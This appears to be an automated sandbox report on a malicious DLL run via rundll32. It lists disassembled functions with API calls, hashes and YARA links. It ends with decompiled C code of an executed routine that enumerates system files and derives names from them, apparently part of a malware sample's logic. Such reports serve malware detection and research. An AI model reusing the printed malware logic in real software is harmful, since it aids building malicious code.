Opcode Fuzzy Hash: de520942f3c43b86ee208adc8aa9727fe09035c948cadf25056f0347b6b020e8
Instruction Fuzzy Hash: F39137B0D1020DEFCF04DFD4D891BEEB7B9AF54308F608469E4156B681EB70AA85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7F32, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6E1A6000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A6006
Part of subcall function 6E1A6000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A601C

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7F4F
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7F5A
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 6E1A7FB0
___DestructExceptionObject.LIBCMTD ref: 6E1A7FD5

Strings

csm, xrefs: 6E1A7F68

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction ID: 995956ca0b8018f99923194b690e5bc195dae0ba890a7f4b59a14275975fd5a0
Opcode Fuzzy Hash: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction Fuzzy Hash: 28214A78A01209DFCB04CE98D0506FE7B76AF50309F60846AE6250B286C730DBC5DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A4160, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A4193
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41A7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41B7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A41C2

Strings

csm, xrefs: 6E1A4188

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction ID: e1372eed2380aa457771c0a52395715814964949e3f8505603e37152869c6523
Opcode Fuzzy Hash: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction Fuzzy Hash: 9511B77CA00209DFCB04DFECC1405ADBBB5EB58204F1189A9D96597311DB74AA81EB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AD370, Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

APIs

UnDecorator::doMSKeywords.LIBCMTD ref: 6E1AD3BE
Mailbox.LIBCMTD ref: 6E1AD52F
DName::DName.LIBVCRUNTIMED ref: 6E1AD3B9

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::DName.LIBVCRUNTIMED ref: 6E1AD540
DName::DName.LIBVCRUNTIMED ref: 6E1AD551

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
String ID:
API String ID: 2417761376-0
Opcode ID: 8fdf34b7ead60d18a43bf3e4755d7b514738e554c226ff0478749c96352c985e
Instruction ID: 82df4e13d1a1c2fe4098583019692984bedf31c35374fff7a6d404fa1d0b84c8
Opcode Fuzzy Hash: 8fdf34b7ead60d18a43bf3e4755d7b514738e554c226ff0478749c96352c985e
Instruction Fuzzy Hash: 955141F9C402089ECF04DFECE951AFD7BF5AF15309F14846AE6066A181E7325A84DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3330, Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B333C

Part of subcall function 6E1B40B0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B40B9
Part of subcall function 6E1B40B0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B4116
Part of subcall function 6E1B40B0: operator+.LIBVCRUNTIMED ref: 6E1B4127
Part of subcall function 6E1B40B0: Mailbox.LIBCMTD ref: 6E1B4133
Part of subcall function 6E1B40B0: Mailbox.LIBCMTD ref: 6E1B4225

Mailbox.LIBCMTD ref: 6E1B33A3
DName::length.LIBVCRUNTIMED ref: 6E1B33BF
DName::getString.LIBCMTD ref: 6E1B33FB

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
String ID:
API String ID: 245642696-0
Opcode ID: b630ad8f0397ae284e4fce6d571c3e2c5e3207ec6a016759676a7c314b10fc70
Instruction ID: 13ba538001ee057e675855f8920c7d9de9676ced03808726678144f835e45c29
Opcode Fuzzy Hash: b630ad8f0397ae284e4fce6d571c3e2c5e3207ec6a016759676a7c314b10fc70
Instruction Fuzzy Hash: A141ED75D04208EFCB05CFE8D4A0AEEBBB5AF59304F24C099D951AB350DB31AAC6DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2D80, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

___scrt_acquire_startup_lock.LIBCMTD ref: 6E1A2DDB
___scrt_fastfail.LIBCMTD ref: 6E1A2DF5
___scrt_dllmain_uninitialize_c.LIBCMTD ref: 6E1A2DFA
__RTC_Initialize.LIBCMTD ref: 6E1A2E04
___scrt_uninitialize_crt.LIBCMTD ref: 6E1A2E36

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Initialize___scrt_acquire_startup_lock___scrt_dllmain_uninitialize_c___scrt_fastfail___scrt_uninitialize_crt
String ID:
API String ID: 485910261-0
Opcode ID: 64094edb1897cb416a5a4b0e28b90187705f9216498db623d44567ad35bd1c44
Instruction ID: 37a866828f1efd68f11a9f238eec8b71e20c7857a0318e410c20b694b7d627b3
Opcode Fuzzy Hash: 64094edb1897cb416a5a4b0e28b90187705f9216498db623d44567ad35bd1c44
Instruction Fuzzy Hash: 4521C079508659DFDB00CFEEC9487EEBBB9FB02319F004659D2059B280DB754584EBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEE30, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEE53
DName::operator+.LIBCMTD ref: 6E1AEE92
DName::operator+.LIBCMTD ref: 6E1AEEA5
Mailbox.LIBCMTD ref: 6E1AEEAE
Mailbox.LIBCMTD ref: 6E1AEEBA

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2657989147-0
Opcode ID: 308c9df5f0253f42658c33754e85cd6bf0b14cec1cbf8b35c0bbf3f76a903c90
Instruction ID: a4c6a3425b6c902a952dbea05f5df6c5943015021e0bfae7e9bd5fb6df493173
Opcode Fuzzy Hash: 308c9df5f0253f42658c33754e85cd6bf0b14cec1cbf8b35c0bbf3f76a903c90
Instruction Fuzzy Hash: A711F1B9D0020CAFCB04DFE8D951BEEB7BDAB44204F108569E615A7280EB316B84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F90, Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1E3E89,00000000,00000800,?,?,6E1E3E89,00000000), ref: 6E1E3FA1
GetLastError.KERNEL32(?,?,6E1E3E89), ref: 6E1E3FB5
_wcsncmp.LIBCMTD ref: 6E1E3FCB
_wcsncmp.LIBCMTD ref: 6E1E3FE2
LoadLibraryExW.KERNEL32(6E1E3E89,00000000,00000000,?,?,?,?,6E1E3E89), ref: 6E1E3FF6

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID:
API String ID: 180994465-0
Opcode ID: f1476b15536c38f48c1e95efc6aea89600e24517b1e7332a86f27cd38a83624d
Instruction ID: c866c88b98091af971d8d31e7f41398992ad9c70deeb44b25ad3f3494f5aba32
Opcode Fuzzy Hash: f1476b15536c38f48c1e95efc6aea89600e24517b1e7332a86f27cd38a83624d
Instruction Fuzzy Hash: 7A01AD70A0420DFBEB249AE1DD4AF9E367B9B51700F204814FA099B2C4DA71DA84D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC7F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6E1A9E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E1A9E26

DName::DName.LIBVCRUNTIMED ref: 6E1AC892
DName::operator+=.LIBCMTD ref: 6E1AC8A3
Mailbox.LIBCMTD ref: 6E1AC8D0

Strings

5, xrefs: 6E1AC84B

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
String ID: 5
API String ID: 3298578019-2226203566
Opcode ID: 507d3291da086951102ea6027dc6b5386e85ad6c0d9f7debb2cf9e74809f3aa1
Instruction ID: 3300ffa2bb42fd1d8c1bf624d2eed62fc49fd7bb2cf5929eb0cf9eaa2a777ec3
Opcode Fuzzy Hash: 507d3291da086951102ea6027dc6b5386e85ad6c0d9f7debb2cf9e74809f3aa1
Instruction Fuzzy Hash: E621A078C40209EFCB04CFE8E9609FEBBB4BF05304F008569E6056B280E7311AC0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A6D10, Relevance: 6.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMTD ref: 6E1A6E13
___AdjustPointer.LIBCMTD ref: 6E1A6E5D
___AdjustPointer.LIBCMTD ref: 6E1A6F0F
___AdjustPointer.LIBCMTD ref: 6E1A6EC7

Part of subcall function 6E1BD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1DC799,?,?,6E1B5367,?), ref: 6E1BD2D2

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AdjustPointer$FeaturePresentProcessor
String ID:
API String ID: 3874303849-0
Opcode ID: 50b1790594710c950759b1ee959f5e38e86446147aa2f32742c1f9e68b94e4d2
Instruction ID: 20afbc00f2018502a5cfe84a6957df6fd7d42443a4c96569b3a8122941b8e962
Opcode Fuzzy Hash: 50b1790594710c950759b1ee959f5e38e86446147aa2f32742c1f9e68b94e4d2
Instruction Fuzzy Hash: 92911C78A1020ADFCB45CF9CD494BAAB7B6FB59305F208459E9155B390C735EC81DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4FC0, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74caf813377549422acdd099a6f1211482d1d54063982cde928a7be88c144c1
Instruction ID: e8cac8a7161596f31dd6214fd9db8b3c57bf19fe339fd8ea42b294ec48ce35ac
Opcode Fuzzy Hash: f74caf813377549422acdd099a6f1211482d1d54063982cde928a7be88c144c1
Instruction Fuzzy Hash: BB315230A10509EFDB54DFE4D854BEE77B9AF44304F208928F5159B694DB70AEC0EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E23F0, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6f65eddbd1a4219ceaaf29dd1215652a2c54bdfc66b32a18abc44c621df873
Instruction ID: cd9806a68a5e54ee59037fa1143ce52818100b7c1667aac0794101aa19c4b222
Opcode Fuzzy Hash: 4e6f65eddbd1a4219ceaaf29dd1215652a2c54bdfc66b32a18abc44c621df873
Instruction Fuzzy Hash: 35314E70A0090AEFDB04DFE4D974BDE77B9AF44305F208928F4159B694EB70AE80EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5100, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e00ee25bb32bc5527d248406d92b2ba71ef307ce3415816b27fabb601b11b8
Instruction ID: f9dbafee7d67c69acc224c8baf7d4f19d3152f8ac51d52b3def4024f630bdb20
Opcode Fuzzy Hash: 47e00ee25bb32bc5527d248406d92b2ba71ef307ce3415816b27fabb601b11b8
Instruction Fuzzy Hash: 45313E34A1050AEFDB44DFE8D854BDE77BAAF44348F108928F5159B694DB70AEC0EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B49F0, Relevance: 6.0, APIs: 4, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1B48F7,00000000,00000800,?,?,6E1B48F7,00000000), ref: 6E1B49FF
GetLastError.KERNEL32(?,?,6E1B48F7), ref: 6E1B4A13
_wcsncmp.LIBCMTD ref: 6E1B4A29
LoadLibraryExW.KERNEL32(6E1B48F7,00000000,00000000,?,6E1B48F7), ref: 6E1B4A3D

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID:
API String ID: 4169583555-0
Opcode ID: 82614a7493958b42c8c29113daad983daebf2e320e85da19a4a22fd8fe878da8
Instruction ID: 67303db22f68ae622d021c565df28efce9d921073b00a358e6957369487df0ab
Opcode Fuzzy Hash: 82614a7493958b42c8c29113daad983daebf2e320e85da19a4a22fd8fe878da8
Instruction Fuzzy Hash: 63F05474A44218FFEB60DBF0CC49B9D37799B01700F208414FA0A9B2C4E7B1EA84D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6E60, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 6E1E6E93

Strings

, xrefs: 6E1E6F64
z, xrefs: 6E1E7167

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: c10cb0e775f3e4c5892551370c2cf636e2869febc1fa64d48b7c51ecbefaa45c
Instruction ID: 0fe0b7309c3830b60132bec68bd85dda1a14ddfc2d9a9846584a81a2b9d31ade
Opcode Fuzzy Hash: c10cb0e775f3e4c5892551370c2cf636e2869febc1fa64d48b7c51ecbefaa45c
Instruction Fuzzy Hash: 16A12C70A4825C9FEB26CF89C891BE9B771EB45304F0480D9E94D5B6C2C274AED1DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B9370, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1B9444
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1B948D

Strings

, xrefs: 6E1B940F

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: TimevecTimevec::_std::_
String ID:
API String ID: 4219598475-3916222277
Opcode ID: 6c127f458c81dfb936e8cc25fc322f75a8904ace768720bf54ca97e890171ee9
Instruction ID: 94ec2a6ff8e8d8e48cdabdb541263a0ae630b96c5667397971d49a995740bea7
Opcode Fuzzy Hash: 6c127f458c81dfb936e8cc25fc322f75a8904ace768720bf54ca97e890171ee9
Instruction Fuzzy Hash: 3E7108B4E00209DFCB04DFE4D891AEEB7B5BF58304F208569D515BB394E735AA82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A055A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

OpenMutexW.KERNEL32(001F0001,00000001,C:\Windows), ref: 6E1A056E
GetWindowsDirectoryW.KERNEL32(C:\Windows,00000649), ref: 6E1A05CD

Strings

C:\Windows, xrefs: 6E1A0561, 6E1A0566, 6E1A05CC

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: DirectoryMutexOpenWindows
String ID: C:\Windows
API String ID: 3115804697-2661751657
Opcode ID: d847e650cbe3b8248d703cbbe6841f7c35e1b12e1590e48705f2faebfc279b21
Instruction ID: 4bfc400a3efa3a965cba5b9319229f6baeea6d32ed012b00b72775faa923f44d
Opcode Fuzzy Hash: d847e650cbe3b8248d703cbbe6841f7c35e1b12e1590e48705f2faebfc279b21
Instruction Fuzzy Hash: F051D175904A608BDB308F99C5983B537B3F747310F154029ED9897388EBB94AA9DFB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B34E8
DName::DName.LIBVCRUNTIMED ref: 6E1B34F7

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

Strings

A, xrefs: 6E1B34A6

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: fc398629b0b1d839c23cf9c4d422210b7e0c672a945f5b3c1fa76ccae5e089dd
Instruction ID: b12dae256f0beddef3dda5629cfa325ef3bb9068d23e282d0994bcdc1a110938
Opcode Fuzzy Hash: fc398629b0b1d839c23cf9c4d422210b7e0c672a945f5b3c1fa76ccae5e089dd
Instruction Fuzzy Hash: CB01AD74D44248BFCB02DFA8D95AAEC7BB5AB41304F14C094EA481F380C7B1AED1EB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A4020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A406E
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A4082

Strings

csm, xrefs: 6E1A4039

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction ID: 8f9f24bf8a084314653756976679167cbf19f10c1d705bc08de5406a15600c6e
Opcode Fuzzy Hash: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction Fuzzy Hash: E201ED38A00208DFCB48CFA9C2508ADBBB6BF54201B608998D5555B315DB71DF82EB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6700 Parent PID: 6672 rundll32.exeCOMMON

Executed Functions

Function 02C94C3B, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02C94C3B(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x2c9d2a0; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x2c9d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x2c9d2a0; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x2c9d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x2c9d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x2c9d2a0; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x2c9d2a4; // 0x24aa5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x2c9e7f2; // 0x73797325
				_t83 = E02C9903C(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x2c9d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x2c9d2a4; // 0x24aa5a8
				_t16 = _t93 + 0x2c9e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x02c94c44
0x02c94c4a
0x02c94c4c
0x02c94c66
0x02c94c68
0x02c94c6d
0x02c94ee2
0x02c94ee9
0x02c94ee9
0x02c94c73
0x02c94c88
0x02c94c8a
0x02c94c8c
0x02c94c91
0x02c94ed2
0x02c94edc
0x00000000
0x02c94edc
0x02c94c97
0x02c94ca2
0x02c94ca7
0x02c94cac
0x02c94caf
0x02c94cb6
0x02c94cbb
0x02c94cc0
0x02c94ec2
0x02c94ecc
0x00000000
0x02c94ecc
0x02c94cd6
0x02c94cda
0x02c94cdd
0x02c94ce0
0x02c94ce6
0x02c94ceb
0x02c94cf4
0x02c94cfa
0x02c94d04
0x02c94d0b
0x02c94d0b
0x02c94d1d
0x02c94d28
0x02c94d36
0x02c94d3b
0x02c94d40
0x02c94d43
0x02c94d48
0x02c94d52
0x02c94d55
0x02c94d58
0x02c94d6e
0x02c94d70
0x02c94d75
0x02c94ec0
0x00000000
0x02c94ec0
0x02c94d8c
0x02c94ddd
0x02c94da0
0x02c94da8
0x02c94dad
0x02c94dbb
0x02c94dc4
0x02c94dcd
0x02c94dcd
0x02c94ddb
0x02c94ddb
0x02c94de1
0x02c94de5
0x02c94de5
0x02c94deb
0x00000000
0x00000000
0x02c94ded
0x02c94df3
0x02c94e9a
0x02c94e9d
0x02c94eaa
0x02c94eaa
0x02c94eae
0x00000000
0x00000000
0x02c94ea3
0x02c94ea7
0x02c94ea7
0x02c94ea9
0x02c94ea9
0x02c94eb3
0x02c94eba
0x02c94ebc
0x00000000
0x02c94ebc
0x02c94df9
0x02c94dfb
0x02c94dfb
0x02c94e0e
0x02c94e14
0x02c94e1f
0x02c94e21
0x02c94e25
0x02c94e27
0x02c94e27
0x02c94e2c
0x02c94e2e
0x02c94e2e
0x02c94e2c
0x02c94e33
0x02c94e37
0x02c94e37
0x02c94e47
0x02c94e4c
0x02c94e4f
0x02c94e4f
0x02c94e52
0x02c94e5c
0x02c94e64
0x02c94e69
0x02c94e77
0x02c94e77
0x02c94e8b
0x02c94e8f
0x02c94e8f

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02C94C66
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02C94C88
memset.NTDLL ref: 02C94CA2

Part of subcall function 02C9903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02C95D90,63699BCE,02C94CBB,73797325), ref: 02C9904D
Part of subcall function 02C9903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02C99067

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02C94CE0
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C94CF4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02C94D0B
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02C94D17
lstrcat.KERNEL32(?,642E2A5C), ref: 02C94D58
FindFirstFileA.KERNELBASE(?,?), ref: 02C94D6E
CompareFileTime.KERNEL32(?,?), ref: 02C94D8C
FindNextFileA.KERNELBASE(02C941AA,?), ref: 02C94DA0
FindClose.KERNEL32(02C941AA), ref: 02C94DAD
FindFirstFileA.KERNEL32(?,?), ref: 02C94DB9
CompareFileTime.KERNEL32(?,?), ref: 02C94DDB
StrChrA.SHLWAPI(?,0000002E), ref: 02C94E0E
memcpy.NTDLL(00000000,?,00000000), ref: 02C94E47
FindNextFileA.KERNELBASE(02C941AA,?), ref: 02C94E5C
FindClose.KERNEL32(02C941AA), ref: 02C94E69
FindFirstFileA.KERNEL32(?,?), ref: 02C94E75
CompareFileTime.KERNEL32(?,?), ref: 02C94E85
FindClose.KERNELBASE(02C941AA), ref: 02C94EBA
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 02C94ECC
HeapFree.KERNEL32(00000000,?), ref: 02C94EDC

Strings

Uxt, xrefs: 02C94ECC, 02C94EDC

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: Uxt
API String ID: 2944988578-1536154274
Opcode ID: 03f1d971d9de6c7b60b6ae7eb7801c892f1203214d3a9b25391aaeb3ffa36445
Instruction ID: d474e9fed557d5a4f96f74a672111d4083e539899a026f7162a1d6259c063185
Opcode Fuzzy Hash: 03f1d971d9de6c7b60b6ae7eb7801c892f1203214d3a9b25391aaeb3ffa36445
